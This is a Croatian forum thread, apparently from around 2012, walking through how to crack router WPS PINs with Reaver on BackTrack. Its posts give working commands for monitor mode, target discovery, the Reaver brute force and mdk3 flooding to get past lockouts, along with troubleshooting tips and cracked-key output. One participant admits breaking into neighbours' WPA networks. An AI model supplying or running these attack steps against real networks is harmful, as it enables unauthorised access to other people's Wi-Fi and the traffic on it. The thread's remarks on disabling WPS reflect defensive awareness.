Gledam ovaj forum još nema nijednu temu o Reaveru, malom programćiću koji bruteforca WPS pin rutera.E sad budući da je mene živo zanimalo kako to radi htio sam to testirati na svom ruteru.Žao mi je što nemam slike jer neznam kako slikat u Linuxu ali sve ću objasniti.E sad da krenemo na sam proces "fuckanja" PIN-a.

Moja wireless karica je AirLive WT2000PCI kupljena prije 2 i pol godine za cca 120 kuna.Reaver je radio na BackTrack 5 R1 distri linuxa.

Prvo što trebate je skinuti Reaver na vaš linux sistem. Najjednostavniji način je

 

apt-get update
pa onda

apt-get install reaver[img]http://cache.gawker.com/assets/images/lifehacker/2012/01/install-reaver.jpg[/img]

to će vam na backtracku i Ubuntu sam skinuti i installati Reaver.
Idemo dalje,prebacite vašu wireless karticu u monitor mode (airmon-ng start wlan0).
E sad trebate BSSID(mac adresa vašeg routera) to dobijete ako da upišete

airodump-ng mon0[img]http://airdump.cz/files/airodumpng-alfa.png[/img]

Sad kad imate BSSID veše mreže i monitoring mod upišete:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 --dht-small -vv -a
naravno iza -b ide BSSID vaše mreže.Ako ste sve u redu napravili dobijete nešto ovako.
[img]http://cache.gawker.com/assets/images/lifehacker/2012/01/cracked.jpg[/img]

Naravno ova gore slika pokazuje gotov čin kod vas će biti drukčije.E sad to crackacnje može i mora potrajati.Za to postoje dva razloga.
Prvi je to što je to bruteforcing i to uvijek potraje.Druga stvar je što će vas ruter sam izbacivat, nakon nekih pola sata će vam reaver izbaciti poruku nešto tipa
AP limitira pakete u tom stilu.E sad kad se to dogodi stisnete CTRL+C da zaustavite reaver(ne brinite spremit će vam dosadašnji napredak)i u drugom terminali sa MDK 3
malo zaspamate ruter idućom naredbom.

mdk3 mon0 a
poslje te naredbe još dodate BSSID od vašeg rutera i pustite ga da radi tako 3 minute. Nakon toga CTRL+C pa ponovo pokrenite Reaver.To će vam se dgađati svekih otprilike pola sata pa samo ponovite postupak sa MDK3.I nakond izvjesnog vremena dobijete ovakvu poruku:

[+] 98.38% complete @ 2012-01-21 15:13:17 (2 seconds/attempt)[+] Trying pin 21134784[+] Trying pin 21136504[+] Trying pin 21132964[+] Trying pin 21134135[+] Trying pin 21130182[+] 98.43% complete @ 2012-01-21 15:13:25 (2 seconds/attempt)[+] Trying pin 21139994[+] Trying pin 21135415[+] Trying pin 21137075[+] Trying pin 21138980[+] Trying pin 21138515[+] 98.47% complete @ 2012-01-21 15:13:33 (2 seconds/attempt)[+] Trying pin 21136375[+] Trying pin 21134487[+] Key cracked in 649 seconds[+] WPS PIN: '21***136'[+] WPA PSK: 'moj_wpa_passkey'[+] AP SSID: 'Celicni'
I to je to uspješno ste razbili WPS PIN te došli do WPA/WPA2 key-a.Naravno sve što radite ovdje navedeno radite na svoju odgovornost te na svojem ruteru(susjede ne dirajte,ne želite vjerujte mi).
Ako netko ima pitanja neka slobodno postavi ovdje i pokušat ću objasniti.

Korisni linkovi:
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

Koliko sati ti je bilo potrebno za tvoj gigaset?Sam da se nadovežem ako ide boot sa live dvd-a ili usb-a tada BT neče zapamtit di je stal.Mora biti instaliran na kompu kada se prestane(CTRL+C)pa nastavlja.

ja sam koristio bt5(live sa usb sticka) i na na njemu sam ručno instalirao reaver (./configure pa make pa na kraju make install)...Za moj gigaset mi je trebalo 5 sati 28 minuta da bruteforce-om razbije pin.

ja sam prekjucer startao backtrack5 s DVD , instalirao sam manualno Reaver , i testirao sam na svom routeru. Stvarno funkcionira ,WPS brute force attack s Rever . Nedostatak je što traje dugo, malo manje od 5h.  Nisam sisprobao s WPA2.

Dakle trebalo bi instalirati na harddisc , da bi Reaver bio stalno na backtracku . Više WPA zaštita ne pomaže puno , a kod sebe sam stavio WPA2 s malo dužim kljucem , veceras isprobam pa javim. 

stavio ti wpa2 ili wpa isto ti je jer ne razbija taj WPA već pokušava crackati WPS pin. uruteru moraš isključiti WPS ako želiš biti siguran...

 

U međuvremeneu pojavila se verzija 1.4. Donosi neke optimizajije vezane uz drivere.za sve ostalo tu je official site

http://code.google.com/p/reaver-wps/

Također postoji Reaver Pro. Radi se o softveru za rutere.Naime pretvara ruter u "hackbox". Evo konretno o čemu se radi.

http://vimeo.com/34667806

Kod mene je bio ukljucen WPS kad sam išao s Reaver , isto je našlo kljuć , doduše bio je stavljen jednostavan kljuć , br. moba. Kod kompliciranih kljuceva ici ce vrlo teško 

WPS pin on cracka a taj pin se nemože promjeniti jer je tvornički ugrađen.

na ubuntu ovo nece raditi,barem meni nije radilo.Skinuo sam reaver-1.4.tar.gz i raspakira,nakon toga 

cd /home/ubuntu/Downloads/reaver-1.4 

ls

cd src

./configure

izbaci gresku error: pcap library not found!

otvorite drugi terminal

apt-get install libpcap3-dev
apt-get install libsqlite3-dev
apt-get install libnl2-dev

opet u prvom utipkajte

./configure

make

make install

i to je to za ubuntu

 

 

Live in action

 

http://www.youtube.com/watch?v=Vg_Wo_1eo5c&feature=related

Prijatelju hvala za odgovore do sada,evo još se mučim sa reaverom.Nešta krene pa stane,jednostavno neznam dali sam na pravom putu.Dali ti je poznato kakve su postavke na Tomshon Telecom ruterima što se tiče WPS,dali su otključani ili ne? neznam dali da čekam više ili ne,nije mi jasno kako da znam dali je wps otključan ili ne?

Živio

ako zelis znati koje mozes hakirati upišeš ovo "wash -i mon0" posle dok instalas reaver...

Prijatelju hvala, to sam otkrio.Sada mi je problem što mi sve to traje dugo, predugo.Sve sam opiso u novoj temi. Dali znaš kakvo riješenje za to, možda postoji neka komanda da to ubrza?

Pozdrav.

Ja ti imam backtrack 5 r1 dualboot i imam instaliran reaver zadnju verziju 1.4 ali verzija 1.1 je osobno meni najbolja i upalilo je ima na youtube video koji sam napravio da pokažem kako to funkcionira i tako otključao mrežu.

http://www.youtube.com/watch?v=a2UpA7MAIqY&feature=related

evo pogledaj ga pa ćeš shvatiti kako reaver radi ili posjeti na facebooku backtrack linux fun page tamo sam administrator gdje možeš pratiti sve o backtracku

video mutan,glazba užasna kao i tvoj engleski pisani

izašao je XiaopanOS Backtrack , slicno kao BEINI , ima instaliran Reaver Inflator (Reaver 1.4 )

tu je i nova verzija  Minidwep-gtk u kojeg je instaliran Reaver.

Dakle oba programčića su super , pokazuje kod koga je ukljucen WPS.

Radi s karticama chipset RT3070 , RTL8187 ,Atheros,  a najbolje su kartice s chipom Ralink 3070 , Realtek RTL8187

 

Xiaopan ima samo 75MB , skinete iso i spržite na CD ili stavite na usb stick ili sd card preko unetbootin.

 

http://www.youtube.com/watch?v=hxcZxRjXphU

 

Puno puno jednostavnije nego s Backtrack 5

 

Može li malo pojašnjenja oko zaspamovanja rutera naredbom mdk3. Pokusavao sam ali nista. Ima li neki drugi nacin, da bi se nastavilo dekriptovanje. Dosao sam do 90.30% i stop. Cak sam mijenjao kompletan hardver sa novom instalacijom BackTraka i drugom WiFi kartom, ali ne mrda ništa. Neda prolazak paketima. Bas me interesuje zasto je stalo? Nije zakljucan WPS. Kakvo je tvoje misljenje?

trebam pomoc...

sve napravim, i sad kad pokrenem reaver... izbaci u prvom redu

waiting for beacom from XX:xx:xx:xx:xx

switching mon0 to channel 1

sad izvrti sve kanale

associated with xx:xx:xx:xx:xx (ESSID: ime mreže)

 

i tu ostane stajati satima?

u cemu je probleem?

Ja se mogu pohvaliti da sam sve skonto, jedan je na nekih 23% a drugi na 15%!!! Nakon sto sam  `zaspemao` sa MDK3 jedno dva puta i proslo nakon cirka od oko dvije minute. E sada vise nece ni nakon pet minuta pa molim malu pomoc da mi se malo boolje pojasni MKD3. Ja sam ga do sada koristio `MDK3 mon0 a bssid` gledam u taj prozor i neznam sto zapravo cekam.

vidim da se radi   o   sx763 routeru. i koliko vidim   svim susjedima  spammas a ne   samo tvojoj meti. koristi cini mi se ....a -a bssid

Hvala! upravo cu da probam. Bas kao sto kazes svima smetam, primjetio sam pun k.... bssid-ova.

ma jok nece sa `mdk3 -a bssid` da radi jedino bez crtice :) to sto sam uvijek i radio, mora biti nes drugo!!! morat cu jos malo caprkat po forumima za mdk3.

mislio sam na "mdk3 mon0 a -a bssid"

cini mi se da je za help mdk3 -h ili tako nesto slicno. pogledaj cijeli help i sve ce ti biti jasno

Hvala stari! U pravu si za a -a bssid, sto se tice helpa dovoljno je samo mdk3. Javim kako bude dalje!

Stari uspjesno! Ja sam znao sve osim toga MDK3-a, spasio si me! Samo malo mi je bilo malo sumljivo jer mi je bio preskocio sa nekih 35% na 92% krenuo dalje i zavrsio na 97%? Tako sam dobio WPS PIN i WPA PSK zasto dva ali radi! BDW dali mi je to mozda malo sje.... AirLive karticu posto sam imao jedno dvije nezasticene mreze koje su u zadnje vrijeme pocele jako stekat? Nego hvala DjRenny-u na postu i posebno tebi POC!

ovo sa 35% na 92% odjednom je normalno jer je reaver pronašao prvu polovicu pina i ostalo je samo 1000 kombinacija. pojasni ovo sa nezasticenim mrezama. jesu to uopce tvoje mreze? (retoricko pitanje)

edit: za hvala postoji pripadajuci gumb

Ne nisu to moje mreze nikako! Ja ti ih lovim oko 25 sto obicnih wpa sto wpa2 i tu su dvije bez ikakvih kljuceva na koje sam isao kada sam morao jer sam prije toga imao dvije probijene obicne wpa mreze koje sam haknuo bez problema i to je islo bez problebma nekih godinu dana i onda su samo nestale tako da su mi ostale samo te dvije bez icega samo cotect i vozi ali slabooooooooooooo, po meni to je ocito jer nisam jedino bio ja na jednoj od te dvije nego pitaj boga koliko njih..... i dok nas on sve usluzi...... Ok. nego jesi koristio WIFIWay spanjolski progmcic koji startas peko sticka. Sa njime sam probio te obicne WPA bez ikakvih pisanja znanja i tlacenja 3-4 clicka mousom i taj pici sve odreda koje moze bez stajanja :)?

Bok dečki..   Ja ima problem imam bt5r3  i reaver 1.4     wash -i mon0   mreže:  wps  lock :no         onda mi ide do 00.02 procenta  kad još jednom probam onda je na    wps lock :yes          i neide više nikamo naprjed kako rješenje?

Neki ruteri imaju blokadu, kad vide da se pin ne pogodi zakljucaju wps i nema se pristupa, jel stalno zakljucavaju, a nekima se nece od blokirat wps sve dok se ruter ne resetira – Za takve rutere moras stavit 30 sekundi razmak pinova jedino tada nece se zakljucat al da probijes treba ti 3 dana. d30

A kod nekih ni to ne pomaze.

 

Odgovaraš na post star 7.5 mjeseci. A čak je autor i neaktivan!

 

Inače prava je rijetkost danas pronaći wifi router sa upaljenim WPS-om. Očito su svi saznali koliko je WPS ranjiv. A i gdje je uključen ima zaštitu blokiranjem pokušaja.

Autor nije bitan vec pitanje, nekoga ce zanimati.

Ima nekih skripti na Kali forumu, koje ujedno salju pin i zatim otkljucavaju ruter ali to predugo traje.